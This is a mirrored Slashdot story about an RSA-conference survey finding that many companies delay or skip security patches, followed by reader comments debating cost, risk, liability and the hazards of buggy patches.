Slashdot Mirror

← Back to Stories (view on slashdot.org)

26% of Companies Ignore Security Bugs Because They Don't Have the Time to Fix Them (bleepingcomputer.com)

Posted by msmash on from the different-priorities dept.

Catalin Cimpanu, writing for BleepingComputer: A survey compiled last month at the RSA security conference reveals that most companies are still behind with proper security practices, and some of them even intentionally ignore security flaws for various reasons ranging from lack of time to lack of know-how. The survey, which compiled answers from 155 security professionals from the companies present at the RSA conference, revealed that only 47% of organizations patch vulnerabilities as soon as they are known. Most worrisome is that some companies wait quite some time before applying patches, exposing their IT infrastructure to attacks. More precisely, 16% wait for one month, while 8% said they only apply patches once or twice a year.

51 of 90 comments (clear)

  1. It's not time, it's money... by TFlan91 · · Score: 4, Insightful

    It's not that I don't have enough time, I do.

    It's that the powers at be only want to spend time on something if a client pays for it.

    1. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      It's that the powers at be only want to spend time on something if a client pays for it.

      Such situations tend to create regulation.

    2. Re:It's not time, it's money... by TFlan91 · · Score: 2

      If you're a plumber and you hear the house two doors down, whose pipes you installed 4 years ago during the construction of the house, has a leak. You aren't going to go and fix it for free, are you?

      I don't know what kind of regulation could facilitate good business and secure products. The more secure you make something, usually the more it will cost the client (even with security-first orientated programming).

    3. Re:It's not time, it's money... by v1 · · Score: 4, Insightful

      well, it IS time. but time IS money. so, yeah, kinda.

      Pinheads that only how how to count beans and don't understand the problem are asking each other "Is it important? How much does it cost? What's the return on investment?"

      They don't see the risk or the cost of losing on the risk. They only see the cost of the fix, and that looks like a very poor ROI, and it gets shot down, or continuously delayed.

      --
      I work for the Department of Redundancy Department.
    4. Re:It's not time, it's money... by TFlan91 · · Score: 2

      You work for free?

      I have some bridges you might be interested in.

    5. Re:It's not time, it's money... by sheetsda · · Score: 2

      This.

      And this is limited isn't limited to contracting situations (where you typically hear the word "client"). I have seen this in companies that sell products on the open market, to whole industries. The company takes the approach that development schedules are dictated by what features customers say they want. Since the customer doesn't know the security problem exists they can't say "I want this fixed". It is therefore not a priority.

    6. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      That's also been my point for quite some time. Almost all the time, the last thing on the client's list of requirements is security. Especially if the client is a consumer...

      Hence the need to legislate harshly...

    7. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      Well isn't that the problem: if your company invests in better security measures, charges more and nothing ever happens, then you lose to your competitor that ignored security completely. It's a dice roll, but the big investors can hedge by investing in multiple dice rolls. Most likely by the time the big security breach happens, the only companies left are the ones who didn't invest in security (their competitors either left the space or stopped investing in security to try to compete with the lower prices). Brand damage hardly matters at that point, either, because you have such a lead on any new entrants, that your evils will be well forgotten by the time anyone can attempt to compete with you.

    8. Re:It's not time, it's money... by cyberchondriac · · Score: 3, Funny

      No, but I have some damn fine hearing..!

      --

      Look back up at my post, now look back down, you're on the Internet. Now look back up. I'm a signature.
    9. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      I second this, every couple weeks I try to underline the fact that our bug graph is going up and we need more people (three man team) yet still find the planning filled to the rim with new features to develop. Occasionally some high-profile customer brings down the hammer on our CEO regarding all the problems that still exist, that seems to help for a couple days.

    10. Re:It's not time, it's money... by Sumus+Semper+Una · · Score: 4, Interesting

      Honest question though: What IS the cost? Equifax suffered a breach of pretty much the most sensitive possible data you can have leaked, and if this article is correct, the total cost is approaching about $500 million. Had there been no data breach or had the data breach never been made public or had there been no political will to prosecute the company then the cost would have been practically nothing.

      Imagine a sort of reverse lottery. If you don't buy a ticket, there is a small chance (and nobody can tell you the exact likelihood) that your reputation will be publicly tarnished and you will be fined millions of dollars. If you buy a ticket, your chance drops drastically (but is never really zero). But the ticket costs thousands of dollars. Would you buy the ticket? What if the ticket is tens of thousands of dollars? What if it's hundreds of thousands of dollars? Is there a point where you will simply refuse to buy the ticket and accept the risk?

      I'm not saying these companies are making the right choice. I'm saying that from a purely practical standpoint I understand why someone might make the choice not to invest heavily into fixing security bugs. It's not the same choice I would make, but I seem to be more risk-averse than the average person judging by the choices I have seen people around me make. Still, if you don't understand why someone would make a decision, how do you ever expect to convince them to make a different decision?

    11. Re:It's not time, it's money... by cwsumner · · Score: 1

      ... Imagine a sort of reverse lottery. If you don't buy a ticket, there is a small chance (and nobody can tell you the exact likelihood) that your reputation will be publicly tarnished and you will be fined millions of dollars. If you buy a ticket, your chance drops drastically (but is never really zero). But the ticket costs thousands of dollars. Would you buy the ticket? ...

      What if the "tickets" had a small but definate chance of being contaminated, and making you very sick? The patches to computer systems have been getting more and more dangerous to people's businesses, to the point where they must consider if the risk from the patch is more than the risk from the criminal intruders. This is the real reason people are waiting, to see what happens to the first to try. All else is excuses to stop you from pestering them.

    12. Re:It's not time, it's money... by Monkey-Wrench-Inc · · Score: 1

      I hate to think of how many times I've had a conversation something like this:

      Manager: Give me a gantt chart of the tasks to get this project done in three months Me: The tasks to get it done will take six months Manager: No, it's easy. Divide the number of tasks into three months and give each task that much time Me: [facepalm]

      No lies detected.

    13. Re:It's not time, it's money... by Tablizer · · Score: 1

      If the PHB's do give it any thought, they may conclude a 15% chance of getting hacked into bankruptcy is worth the risk of growing now by shaving off security measures. If the company croaks, they blame it on the techies (they don't put corner-cutting orders in writing), and move on to a different gig. Rinse, repeat.

      --
      Table-ized A.I.
    14. Re: It's not time, it's money... by jd · · Score: 2

      Oh, that's easy.

      1. All commercial software must be classed as fit for purpose within specified design parameters.

      2. All commercial software must have a warranty of 5 years where all defects will be fixed at vendor's expense.

      3. Vendors of software that violates CERT's secure coding rules, implements back doors or uses encryption algorithms broken at time of release shall be liable for losses due to security flaws.

      4. Vendors of mission-critical software must, on demand, provide proof of formal methods, extreme programming or tandem programming, and must be able to show ISO 900x compliance where relevant.

      5. Vendors who cannot provide a court with design documents and specifications, and proof the software complies with them, shall be deemed automatically at fault in any lawsuit.

      6. It shall be a crime punushable by 10 years to provide any mission critical device with unsecured or unauthenticated network access, whether anyone is injured or not.

      That should take care of everything.

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    15. Re:It's not time, it's money... by Kjella · · Score: 1

      The real issue with the reverse lottery is not whether the company would stomach the risk. It's that to the individual manager the risk is very low, while the worst consequence is that he's fired. It's the same reason many managers like to kick the can down the road, it's not because it's good for the business but his performance looks good one more quarter. They're seeing most the upside when it goes well and very little of the downside when things go catastrophically bad.

      --
      Live today, because you never know what tomorrow brings
    16. Re:It's not time, it's money... by Darinbob · · Score: 1

      It's true, the security must be treated as a feature, and the customer must be told that security is a feature that they want (sometimes it seems this isn't true). However the fault often lies in sales and marketing, where a deadline for product delivery is set before product design and development even begins. Security often gets short-shrift at the end when a project is running late. That's why your security subject matter expert must always be a bastard willing to shout in meetings. The security team should not be trying to win a popularity contest. And if you don't have a security team, then you need to get one.

      Also, don't let your company be run by a bunch of people who think they know it all but have no real world experience. They're the one's most likely to want to shift stuff fast and get their bonus/options and cash out before it comes crashing down.

    17. Re:It's not time, it's money... by thegarbz · · Score: 1

      What IS the cost?

      You can't consider the cost in isolation. You can only consider the risk. If you only consider cost then nothing would ever advance as you don't take into account the likelihood of the high-cost event hitting you.

      Risk is fundamentally the likelihood of something happening and the consequence of it happening. I could die from getting hit by an asteroid. It's unlikely so I live with the risk rather than building an asteroid proof hat.

    18. Re:It's not time, it's money... by v1 · · Score: 1

      Imagine a sort of reverse lottery. If you don't buy a ticket, there is a small chance (and nobody can tell you the exact likelihood) that your reputation will be publicly tarnished and you will be fined millions of dollars. If you buy a ticket, your chance drops drastically (but is never really zero). But the ticket costs thousands of dollars.

      That already exists, and it's called "medical insurance" ;)

      --
      I work for the Department of Redundancy Department.
    19. Re: It's not time, it's money... by david_thornley · · Score: 1

      Writing secure software isn't really that hard, but you need to do it from the beginning and you need to keep it in mind when making changes.

      Which should mean that there is complicated software out there without security flaws, and I don't believe that.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  2. patch vulnerabilities as soon as they are known by Anonymous Coward · · Score: 1

    Yea, no shit. You don't just apply a vendor supplied patch to prod and hope it doesn't break anything.

    1. Re:patch vulnerabilities as soon as they are known by supremebob · · Score: 2

      Yeah, that didn't exactly work out well for the early adopters of the Spectre and Meltdown fixes. Not only were they initially buggy as well, but they didn't even fix all of the security flaws.

      Like it or not, it's usually best to wait a day or two for someone else to be the guinea pig for security patches before putting them into Production, unless the issue is actively being exploited by a virus or a worm.

    2. Re:patch vulnerabilities as soon as they are known by thegreatbob · · Score: 1

      Better still, some (*cough* MS patches going to Win7 and 2K8) introduced additional flaws...

      --
      There is no XUL, only WebExtensions...
  3. Then 26% should be sued by Rick+Schumann · · Score: 3

    Fix your shit or be run out of business. I think I speak for the majority when I say we're all sick and bloody well tired of having every gods-be-damned thing on the planet hacked by whoever because the firmware/software is written poorly.

    1. Re:Then 26% should be sued by Anonymous Coward · · Score: 3, Insightful

      Were it only so simple, but a few things tend to push security down the priority list.

      1) Lack of perceived value. If it takes company A 100 man hours to implement a product with proper security, and company B 80 man hours do to the same thing but with poorer security practices, then most clients and consumers will choose company B (assuming no other factors at play) because of the reduced cost and the fact that good secure implementations are not easy to ascertain at a glance.

      2) Lack of perceived consequences for poor security. Equifax has had one of the biggest breaches personal information for the US. It's stock price hasn't recovered back to it's previous highs, but it's slowly and steadily coming back up (and to be fair, it was overvalued in the first place). To most people that just means that the cost of having a big breach isn't that big a deal.

      3) The traditional fight between connivance and security. Convenient things make good first impressions, good first impressions tend to make sales.

      There's some other factors but I think those three points tend to broadly cover most of the reasons why security isn't prioritized. I wish it wasn't so but that's the reality that we have to deal with.

    2. Re:Then 26% should be sued by Rick+Schumann · · Score: 1

      How hard is it to not leave a hard-coded Administrator password in something as a backdoor? Also if you're so goddamned smart then why are you posting as an AC? Is it because you're actually an idiot who should have kept his mouth shut?

    3. Re:Then 26% should be sued by holophrastic · · Score: 1

      It's not my shit to fix. I didn't create it. I bought a [software] tool, I paid for it, I've been using it for some time.

      It was always broken, but it took this much time for someone to notice the bug. Now there's a fix.

      I don't have time to stop manufacturing white tube socks in order to upgrade the e-mail client that I purchased years ago.

      So sorry.

      You have three options.

      The first is the current plan -- I get to it when I get to it, and you don't complain.

      The second is that you have the creator of the software pay to upgrade me -- that means paying for my downtime and retraining too.

      The third is that you do what you do in every other industry -- you start prosecuting the criminals. It's not illegal to get burglarized. It's criminal to burgle.

      So, let me ask you this: do you live in a house? Is there a lock on your front door? Well, hackers have defeated that lock, so you need to upgrade to a dead-bolt. Do you have a dead-bolt? Well, hackers can break windows too. You need to upgrade to bars on your windows.

      Do you drive a car? At high speeds? On roads with on-coming traffic? Separated by nothing but a yellow stripe of paint? I guess you need to upgrade to a tank.

      I'm not responsible for criminals breaking down my door with more equipment than I can afford to resist. So sorry. My entire car can be lifted up and carried away by six teenage boys. It doesn't matter how good my locks are. Half of my car is canvas, so a knife is sufficient.

      So, like everything else in my life, I'll upgrade my systems when a) I buy new systems or b) after I get attacked. Welcome to life.

      Meanwhile, we've solved this problem long ago: it's called law enforcement. You can't stop me from walking up to someone in public and killing them with a baseball bat.

      So start prosecuting criminals.

    4. Re:Then 26% should be sued by vtcodger · · Score: 1

      If your solution is writing quality software, that's a non-starter. It might be possible to write really good software. But it'd be text based. No fonts. No images. Very few capabilities. Few or no configuration options. And it'd cost.

      Trust me, the world is not yet ready for a life without cat videos. Maybe after another decade of pain, that'll look like an OK idea. But for the time being we're going to continue to hold things together with duct tape and charge forth into a glorious (if wildly insecure) future while blaming other people for the problems we are creating.

      --
      You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
    5. Re: Then 26% should be sued by jd · · Score: 2

      If you bought a car and the car is then recalled due to a propensity for the brakes to fail, you don't get to claim in court that the pedestrian you ran into was just unlucky but that it wasn't your shit to fix.

      That excuse doesn't fly. If the product is dangerously defective and you know that it is, you are liable.

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    6. Re: Then 26% should be sued by jd · · Score: 1

      In part, software vendors renting rather than selling products are responsible, along with a refusal to offer a warranty.

      I'd suggest placing stiff penalties on failing to follow established practices, and jail sentences for failing to fix in a timely manner or responsibly upgrade in a timely manner.

      Making it a criminal offence with a ten year fixed tarrif should liven things up.

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    7. Re:Then 26% should be sued by FormOfActionBanana · · Score: 1

      Should we give you a secure coding quiz?

      --
      Take off every 'sig' !!
    8. Re: Then 26% should be sued by holophrastic · · Score: 1

      I won't allow you to equate the privacy of names and phone numbers with instant death.

    9. Re: Then 26% should be sued by jd · · Score: 1

      From a software standpoint, a failure to validate inputs and a failure to validate code against a specification is independent of what the code does.

      In ISO 9000 training, we were taught that we should consider anything that could cost $1m or more if things went wrong to be equivalent to killing someone. But, hey, what does NASA know about failure not being an option?

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    10. Re:Then 26% should be sued by Anne+Thwacks · · Score: 1
      If it takes company A 100 man hours to implement a product with proper security, and company B 80 man hours do to the same thing but with poorer security practices, then most clients and consumers will choose company B

      Most non-technical people do not have even the most basic grasp of the issues, and cannot be expected to. They assume that software is required to be "goods of merchandisable quality" like anything else, and believe bugs crawl into software the same way cockroaches get in the kitchen. They simply don't understand that most software is designed and written by people who work in an environment where "doing the right thing" could be a sackable offence (despite the fact that this also appears to be the case in a lot of dead-end jobs like working for Amazon).

      This includes most CXOs judges and juries.

      Massive legal penalties are required. Urgently. In particular, MS executives should be sent to Parchment Farm in droves.

      And, "a jury of your peers" should mean that the jury should have sufficient understanding of the issues as to be in a position to grasp the concepts involved in the charges (a problem with most white collar crime). However, we don't want to expose ourselves to a situation where the police police themselves - we know where that ends up (blood on dance floor).

      --
      Sent from my ASR33 using ASCII
    11. Re: Then 26% should be sued by Salgak1 · · Score: 1

      Good old little Bobby Tables. . .

  4. Like Windows XP in China. by xack · · Score: 1

    No support from Microsoft for over four years but still over 10% market share for the security hole OS It will get even worse when Firefox drops support.. It gets to the point where it's easier to reformat every few months than to keep updating. Most viruses probably get great firewalled anyway.

  5. In related news by rsilvergun · · Score: 5, Informative

    74% of companies lie on surveys.

    --
    Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
    1. Re:In related news by 140Mandak262Jamuna · · Score: 1

      92.3% of the statistics are made up on the spot.

      --
      sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
  6. depth of defense by Spazmania · · Score: 1

    Correct security is about depth of defense. If you -have- to patch immediately every time then you've already failed.

    Take your time. Do it right. If you understand your security posture and have designed it well, patching once or twice a year may well be sufficient.

    --
    Moderating "-1, Disagree" is simple censorship. Have the guts to post your opinion.
  7. no consequences by Anonymous Coward · · Score: 3, Insightful

    it's because of the lack of consequences, not because of time.... they would take the time to fix the issues if there would be appropriate consequences if they don't

  8. Re:Nobody should by jbmartin6 · · Score: 1
    This article is just as good as those "studies" which revealed people would tell their password for a scoop of ice cream. Without any context the information is meaningless. Was it even really the password? Which password, their bank account or some useless website login? Here's a breathtakingly ignorant statement from the article:

    even if they were to hire penetration testing services they were sure the pen-testers wouldn’t expose any new risks or flaws. The sheer ignorance of such statement somewhat explains why some respondents admitted to not having time to apply security patches

    We hired a pentester and they didn't expose any flaws, we already knew about all of them. Phishing email, macro or exploit to powershell to downloaded binary to credential theft via LLMNR/NBNS to pass the hash to admin account, and so on. If you are hiring a pentester solely to expose new flaws, you are doing it wrong. Much like the author of this article.

    --
    This posting is provided 'AS IS' without warranty of any kind, implied or otherwise.
  9. Purely from academic interest ... by Hognoxious · · Score: 1

    Purely from academic interest and in the cause of like research and al that, which 26%?

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  10. They are lying. by JimSadler · · Score: 1

    If you have a labor vs. time issue you hire more people with the abilities needed to do the job. That means it is really a money problem or a cheap problem. Where you run into this is when you are a consumer. you have an issue. You make a phone call. You run into fruitless robotic replies that do not address your issue at all and every time they steer you to another robotic responder you end up at another dead end. The penny pinchers have gained control. It is one heck of a lot cheaper to jerk people around with poorly functioning answering machine programs. And it gets a lot worse. The next treat is that when you finally find a way to connect with a human they are usually so under trained or adequate for their jobs that the answers you get are way off base and make things even worse than they were before. I have found the way to get around those voice robots and that is to call the sales department. No business is dumb enough to insult potential buys with no human answering the phone. The sales department will usually transfer you to an employee who supposedly is familiar with the issue. If you want practice at this madness simply become a Comcast customer. You can have a real thrill as they can't figure out that you were double billed for over four months. Rarely can the people who answer the phones that you are lucky to reach, actually know what they are doing. And more of a howler the typical employee thinks they are super good at their job.

    1. Re:They are lying. by david_thornley · · Score: 1

      If you have a labor vs. time issue you hire more people with the abilities needed to do the job.

      Ah, another person who hasn't yet read Brooks' "Mythical Man-Month". There's a chapter examining exactly what happens when you hire more qualified people because you're not going to make the deadline.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  11. Blue Screens by shayd2 · · Score: 1
    Given the history of "patches" bricking machines. You don't want to be on the bleeding edge of patching.

    Most organizations don't have resources to hold a fall back copy of their production server(s)

    1. Re:Blue Screens by viperidaenz · · Score: 1

      Most (read: all) organisations I've worked for have two sets of production servers. Prod and DR.
      Software updates and patches only happen to one at a time, until it has been proven good. If there's a failure, there's almost no down-time as the server roles are switched.

  12. Because that worked so well by rsilvergun · · Score: 1

    for Microsoft. And if you want hardened firmware for the tablet you give your kid to watch youtube be my guest. It'll be $1500. Me? I'll stick to my $60 el-cheapo. I don't always need perfect security.

    --
    Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
  13. Or.. by MpVpRb · · Score: 1

    ..don't have the technical competence

    Security is hard

  14. Security only becomes a critical issue by nehumanuscrede · · Score: 1

    when your Corporate name is being dragged through the mud, the Litigation Monster makes an appearance, your share-holders are getting out the torches and pitch forks and management is frantically looking through the list to see which Junior Developer they can pin the blame on for the ' bug ' in the code.

    THAT is the only time companies take security seriously because, let's be honest, there are otherwise no consequences for being the Corporate equivalent of an incompetent fuck up. A slap on the wrist, a mediocre fine, maybe a name change and it's back to business as usual.

    Once upon a time, a brand name MEANT something. $brand could command a higher price tag because $brand was synonymous with a quality product.

    Those days are long gone.

    Thus the era of Incompetence has arrived. Where some decent Q/A or even realistic Beta Testing may have caught your problem long before it became that giant Iceberg you're sailing into.

    But no ones cares. We have enough life boats.

    Full speed ahead ! :|

  15. . . . or they spent the money on something else. . by Salgak1 · · Score: 1

    . . . I run a Secure Code Analysis team. I am **CONSTANTLY** bombarded with "well, this is legacy code, there's no budget left for security. . . ."

    Dude. One of the requirements in the contract was to comply with the appropriate regulations and best practices. Which, despite my team bugging you for literally YEARS, and pointing out where the contract specifically requires code reviews. . . .I get told "when did this requirement come in" and "we don't have the money for that." But apparently they had the money for three extra Vice Presidents and their staffs. . . /boggle

  16. Risk Management. . . by Salgak1 · · Score: 1

    . . . anyone who has studied for a CISSP or SANS GIAC Cert knows about risk management.

    1. How likely is the bug to be exploited (x times a year)
    2. How much damage will the bug cost ? (y dollars per attack")

    . . . and THEN: how much will it cost to fix the bug. ( call it "z": recoding, testing, review. distribution of fix)

    Then you do the math: If z is less than x times y, it makes sense to fix the bug. If z is more than x times y, and especially much more, you accept the risk. And you revisit the question periodically, as security is a ongoing process, not a single pass-it-and go state.